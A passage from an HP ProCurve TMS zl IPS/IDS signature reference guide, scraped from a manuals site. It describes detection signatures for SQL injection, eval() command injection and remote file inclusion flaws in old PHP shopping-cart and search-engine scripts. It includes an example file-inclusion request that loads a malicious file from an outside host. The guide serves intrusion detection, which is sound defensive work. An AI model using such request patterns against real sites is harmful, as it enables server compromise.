TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94

ManualsBrandsHP ManualsComputer AccessoriesHP ProCurve Switch xl Access Controller Module

761

762

763

764

765

766

767

768

769

770

ProCurve TMS zl Module IPS/IDS Signature

Reference Guide Version RLX.10.2.2.94

768

BA413F034904.Upgrade to the latest version of WinZip (10.0 Build 7245 or later), available from the WinZip Web

site.

Signature ID: 34100

IG Shop remote attackers execute arbitrary commands vulnerability

Threat Level: Severe

Industry ID: CVE-2007-0132

Bugtraq: 21874

Signature Description: IG Shop is a full powerful featured PHP MySQL based shopping cart system that enables you

create an online shop quickly. iG Shop 1.0 allow remote attackers to execute arbitrary code, here issue is due to input

validation errors script "compare_product.php" or "display_review.php" that do not validate certain parameters "id" or

"user_login_cookie" before being used in SQL statements, which could be exploited by malicious people to conduct

SQL injection attacks. No remedy.

Signature ID: 34101

IG Shop remote attackers execute arbitrary commands vulnerability

Threat Level: Severe

Industry ID: CVE-2007-0132 Bugtraq: 21874

Signature Description: IG Shop is a full powerful featured PHP MySQL based shopping cart system that enables you

create an online shop quickly. iG Shop 1.0 allow remote attackers to execute arbitrary code, here vulnerability is due to

input validation errors in "page.php" or "cart.php" that do not validate the "action" parameter before being passed to an

"eval()" call, which may be exploited by remote attackers to inject and execute arbitrary commands with the privileges

of the web server.

Signature ID: 34102

IG Shop remote attackers execute arbitrary commands vulnerability

Threat Level: Severe

Industry ID: CVE-2007-0132 Bugtraq: 21874

Signature Description: IG Shop is a full powerful featured PHP MySQL based shopping cart system that enables you

create an online shop quickly. iG Shop 1.0 is vulnerability is due to input validation errors in "cart.php" that do not

validate the "action" parameter before being used SQL queries, which may be exploited by remote attackers to inject

and execute arbitrary commands with the privileges of the web server. No remedy.

Signature ID: 34103

Aratix Remote File Include Vulnerability

Threat Level: Severe

Industry ID: CVE-2007-0135

Signature Description: Aratix could allow a remote attacker to include arbitrary files.A remote attacker can send a

specially-crafted URL request to "inc/init.inc.php" script that does not validate the "current_path" parameter. It could

upload a malicious file from another remote system by http or https or ftp (

inc/init.inc.phpcurrent_path=http://[target]/[path]/[maliciousfile] ). While executing this malicious file in our system

the attacker can access whatever he wants as per the malicious code.

Signature ID: 34104

DEMO PPC Search engine INC parameter file include vulnerability

Threat Level: Severe

Industry ID: CVE-2007-0167

Bugtraq: 21961

Signature Description: DEMO-PPC Search engine could allow a remote attacker to include arbitrary files. A remote

attacker can send a specially-crafted URL request to multiple scripts using the INC parameter to upload a malicious file